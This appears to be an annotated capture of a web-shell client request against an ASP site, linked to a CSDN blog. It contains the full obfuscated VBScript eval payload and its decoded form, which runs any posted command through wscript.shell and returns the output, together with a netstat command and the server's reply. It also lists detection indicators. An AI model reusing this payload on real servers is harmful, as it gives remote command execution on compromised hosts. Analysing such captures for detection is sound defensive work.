http://blog.csdn.net/webxscan 神龙
命令行
webxscan=Eval ("Execute(""On+Error+Resume+Next:Function+bd%28byVal+s%29%3AFor+i%3D1+To+Len%28s%29+Step+2%3Ac%3DMid%28s%2Ci%2C2%29%3AIf+IsNumeric%28Mid%28s%2Ci%2C1%29%29+Then%3AExecute
%28%22%22%22%22bd%3Dbd%26chr%28%26H%22%22%22%22%26c%26%22%22%22%22%29%22%22%22%22%29%3AElse%3AExecute%28%22%22%22%22bd%3Dbd%26chr%28%26H%22%22%22%22%26c%26Mid%28s%2Ci
%2B2%2C2%29%26%22%22%22%22%29%22%22%22%22%29%3Ai%3Di%2B2%3AEnd+If%22%22%26chr%2810%29%26%22%22Next%3AEnd+Function:Response.Write(""""->|""""):Execute(""""On+Error+Resume+Next:""""%26bd
(""""53657420583D4372656174654F626A6563742822777363726970742E7368656C6C22292E657865632822222222266264285265717565737428227A3122292926222222202F6320222222266264285265717565737428227A32222929
2622222222293A496620457272205468656E3A533D225B4572725D2022264572722E4465736372697074696F6E3A4572722E436C6561723A456C73653A4F3D582E5374644F75742E52656164416C6C28293A453D582E5374644572722E526
56164416C6C28293A533D4F26453A456E642049663A526573706F6E73652E7772697465285329"""")):Response.Write(""""|<-""""):Response.End"")")
&z1=636D64&z2=6364202F642022433A5C446F63756D656E747320616E642053657474696E67735C615CD7C0C3E65C7777775C2E5C22266E657473746174202D616E207C2066696E64202245535441424C495348454422266563686F205B5
35D266364266563686F205B455D
&z1=cmd
&z2=cd /d "C:\Documents and Settings\a\桌面\www\.\"&netstat -an | find "ESTABLISHED"&echo [S]&cd&echo [E]
' Decoded form of the hex string that the captured request body passes to bd() and then to Execute.
' Purpose: launch the program named in request parameter z1 with "/c" followed by the command line
' from z2, then return whatever the process printed in the HTTP response.
' Both parameters arrive hex-encoded; bd() is the hex decoder defined earlier in the same request body.
' NOTE(review): the server-side script that evaluates the posted "webxscan" parameter is not shown on
' this page; presumably a one-line eval/execute of that request field. Confirm on the affected host.
' Indicators visible in this capture, for detection and triage:
'   - a posted value that begins with Eval ("Execute(... and carries a long hex string,
'   - companion parameters z1 and z2 holding hex (z1 decodes to "cmd" here),
'   - a response body wrapped in "->|" ... "|<-" with "[S]" / "[E]" markers around the working directory,
'   - the web application's script host starting the z1 program as a child process.
Set X=CreateObject("wscript.shell").exec(""""&bd(Request("z1"))&""" /c """&bd(Request("z2"))&"""")
' The outer wrapper in the request prepends "On Error Resume Next", so a failed exec is caught here
' rather than aborting the page.
If Err Then
' Return the error description to the client in place of command output.
S="[Err] "&Err.Description
Err.Clear
Else
' Read everything the child process wrote to stdout, then to stderr.
O=X.StdOut.ReadAll()
E=X.StdErr.ReadAll()
' Concatenate: stdout first, stderr appended.
S=O&E
End If
' Write the result into the response; the wrapper emits the "->|" and "|<-" delimiters around it.
Response.write(S)
->| TCP 127.0.0.1:80 127.0.0.1:1233 ESTABLISHED
TCP 127.0.0.1:1026 127.0.0.1:1027 ESTABLISHED
TCP 127.0.0.1:1027 127.0.0.1:1026 ESTABLISHED
TCP 127.0.0.1:1110 127.0.0.1:1111 ESTABLISHED
TCP 127.0.0.1:1111 127.0.0.1:1110 ESTABLISHED
TCP 127.0.0.1:1233 127.0.0.1:80 ESTABLISHED
[S]
C:\Documents and Settings\a\桌面\www
[E]
|<-